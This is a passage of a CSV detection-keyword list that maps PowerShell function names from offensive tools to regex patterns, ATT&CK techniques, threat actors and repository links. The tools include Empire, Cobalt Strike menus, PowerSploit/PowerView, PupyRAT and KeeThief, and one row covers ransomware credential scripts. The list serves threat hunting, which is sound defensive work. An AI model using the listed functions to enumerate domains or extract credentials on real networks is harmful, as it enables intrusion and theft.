Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45044" "*Find-FileWMImplant*",".{0,1000}Find\-FileWMImplant.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. 
WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","45045" "*Find-Fruit.*",".{0,1000}Find\-Fruit\..{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Find-Fruit.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45046" "*Find-Fruit.ps1*",".{0,1000}Find\-Fruit\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1108","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45047" 
"*findgpocomputeradmin*",".{0,1000}findgpocomputeradmin.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","45048" "*Find-GPOComputerAdmin*",".{0,1000}Find\-GPOComputerAdmin.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","45049" "*Find-GPOComputerAdmin*",".{0,1000}Find\-GPOComputerAdmin.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45050" "*Find-GPOComputerAdmin*",".{0,1000}Find\-GPOComputerAdmin.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45051" "*Find-GPOComputerAdmin*",".{0,1000}Find\-GPOComputerAdmin.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - 
T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","45052" "*Find-InsecureResourceDelegations*",".{0,1000}Find\-InsecureResourceDelegations.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","45053" "*Find-InterestingDomainAcl*",".{0,1000}Find\-InterestingDomainAcl.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement Enumeration With PowerView","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","Black Basta","Lateral Movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45054" "*Find-InterestingDomainAcl*",".{0,1000}Find\-InterestingDomainAcl.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","45055" "*Find-InterestingDomainAcl*",".{0,1000}Find\-InterestingDomainAcl.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 
- T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","45056" "*Find-InterestingDomainAcl*",".{0,1000}Find\-InterestingDomainAcl.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45057" "*Find-InterestingDomainAcl*",".{0,1000}Find\-InterestingDomainAcl.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45058" 
"*findinterestingdomainsharefile*",".{0,1000}findinterestingdomainsharefile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","45059" "*Find-InterestingDomainShareFile*",".{0,1000}Find\-InterestingDomainShareFile.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active 
Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","45060" "*Find-InterestingDomainShareFile*",".{0,1000}Find\-InterestingDomainShareFile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","45061" 
"*Find-InterestingDomainShareFile*",".{0,1000}Find\-InterestingDomainShareFile.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45062" "*Find-InterestingDomainShareFile*",".{0,1000}Find\-InterestingDomainShareFile.{0,1000}","offensive_tool_keyword","powerview","PowerView 
is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45063" "*find-interestingfile -*",".{0,1000}find\-interestingfile\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","45064" "*Find-InterestingFile*",".{0,1000}Find\-InterestingFile.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45065" "*Find-InterestingFile*",".{0,1000}Find\-InterestingFile.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45066" "*Find-InterestingFile*",".{0,1000}Find\-InterestingFile.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - 
T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","45067" "*Find-KeePassconfig *",".{0,1000}Find\-KeePassconfig\s.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","45068" "*Find-KeePassconfig *",".{0,1000}Find\-KeePassconfig\s.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subscriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","45069" "*Find-KeePassconfig C:\*",".{0,1000}Find\-KeePassconfig\sC\:\\.{0,1000}","offensive_tool_keyword","Dispossessor","credential scripts used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","45070" 